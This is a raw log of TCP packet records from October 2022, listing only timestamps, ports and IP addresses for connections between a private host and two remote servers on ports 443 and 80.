Oct 7, 2022 15:59:25.600668907 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.601413012 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.601475954 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.601484060 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.601505995 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.601564884 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.609920025 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.610064983 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.610249996 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.610321045 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.610511065 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.610575914 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.610583067 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.610605001 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.611248016 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.611311913 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.611330986 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.611386061 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.615427017 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.615521908 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.615581036 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.615591049 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.615617990 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.615644932 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.615683079 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.615758896 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.615809917 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.615823030 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.615845919 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.615878105 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.615907907 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.615973949 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.616025925 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.616039991 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.616060972 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.616096973 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.616147041 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.616210938 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.616211891 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.616233110 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.616295099 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.616302013 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.616317034 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.616380930 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.616439104 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.616460085 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.616483927 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.616519928 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.617173910 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.617252111 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.617260933 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.617283106 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.617340088 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.617340088 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.617364883 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.617419958 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.617475033 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.617491961 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.617544889 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.617871046 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.617935896 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.618936062 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.619013071 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.619064093 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.619146109 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.619191885 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.619251013 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.619263887 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.619308949 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.619360924 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.620068073 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.620141029 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.620193005 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.620249987 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.620301962 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.620352983 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.627229929 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.627372980 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.627372026 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.627405882 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.627446890 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.627516985 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.627582073 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.627599955 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.627978086 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.628098965 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.628154039 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.628170013 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.628220081 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.628228903 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.628257990 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.628531933 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.628758907 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.628823042 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.628906012 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.628959894 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.629024982 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.629090071 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.629149914 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.629205942 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.629656076 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.629718065 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.629772902 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.629829884 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.629900932 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.629956961 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.630016088 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.630076885 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.630589008 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.630681992 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.630709887 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.630779982 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.630815983 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.630980015 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.631061077 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.631079912 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.631572962 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.631639957 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.631658077 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.631694078 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.631829023 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.631886005 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.631910086 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.631975889 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.632397890 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.632479906 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.632539034 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.632647991 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.632657051 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.632682085 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.632741928 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.633292913 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633367062 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.633375883 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633393049 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633466005 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633518934 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.633537054 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633559942 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633591890 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.633608103 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633635044 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633683920 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.633699894 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633719921 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633752108 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.633765936 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633794069 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633867979 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633896112 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.633915901 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.633935928 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.633949995 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634031057 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634094000 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.634110928 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634130955 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634166956 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.634181976 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634208918 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634264946 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.634280920 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634301901 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634337902 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.634352922 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634377003 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634404898 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.634419918 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634450912 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634502888 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.634517908 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634540081 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634571075 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.634583950 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634790897 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.634852886 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.651535988 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:26.894264936 CEST	49706	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:26.895139933 CEST	49713	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:26.920344114 CEST	80	49706	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:26.920491934 CEST	49706	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:26.924792051 CEST	80	49713	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:26.924927950 CEST	49713	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:26.926707029 CEST	49713	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:26.956434011 CEST	80	49713	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:26.957473040 CEST	80	49713	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:26.998394966 CEST	49713	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:28.334167004 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.334222078 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.334321976 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.335408926 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.335457087 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.384390116 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.384483099 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.529161930 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.529220104 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.530129910 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.530846119 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.530894995 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.671188116 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.671278000 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.671350002 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.671387911 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.671416998 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.671452045 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.671464920 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.671480894 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.671519995 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.671521902 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.671545982 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.671713114 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.672600031 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.672754049 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.674282074 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.674355030 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.674453974 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.674513102 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.688102961 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.688188076 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.688205004 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.688244104 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.688875914 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.688963890 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.688996077 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.689764023 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.690167904 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.690242052 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.690268993 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.690288067 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.690373898 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.691426992 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.691508055 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.691538095 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.691600084 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.692636967 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.692708969 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.693531036 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.693614006 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.693628073 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.693665028 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.693726063 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.694297075 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.694447041 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.694468975 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.694504023 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.694569111 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.695183039 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.695252895 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.695990086 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.696058035 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.696084023 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.696141958 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.697020054 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.697089911 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.697110891 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.697168112 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.705323935 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.705416918 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.705425024 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.705450058 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.705523968 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.705954075 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.706039906 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.706057072 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.706094980 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.706521034 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.706625938 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.706680059 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.707381964 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.707442999 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.707453012 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.707474947 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.707524061 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.708081007 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.708164930 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.708201885 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.708221912 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.708250046 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.708312035 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.708338976 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.708440065 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.709110975 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.709186077 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.709188938 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.709208965 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.709261894 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.709950924 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.710019112 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.710030079 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.710051060 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.710108042 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.710123062 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.710149050 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.710206985 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.710851908 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.710921049 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.710953951 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.711009979 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.711651087 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.711720943 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.711739063 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.711806059 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.711818933 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.712348938 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.712416887 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.712424994 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.712454081 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.712891102 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.713004112 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.713063955 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.713087082 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.713135958 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.713156939 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.713206053 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.713988066 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.714054108 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.714067936 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.714091063 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.714142084 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.714167118 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.714217901 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.714235067 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.714288950 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.714936972 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.715023041 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.715075016 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.715094090 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.715114117 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.715152979 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.721894979 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.721946955 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.721995115 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.722039938 CEST	49714	443	192.168.2.5	185.60.216.35
